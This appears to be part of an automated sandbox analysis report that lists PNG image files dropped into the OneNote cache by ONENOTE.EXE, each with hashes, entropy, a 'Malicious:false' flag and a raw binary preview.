                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
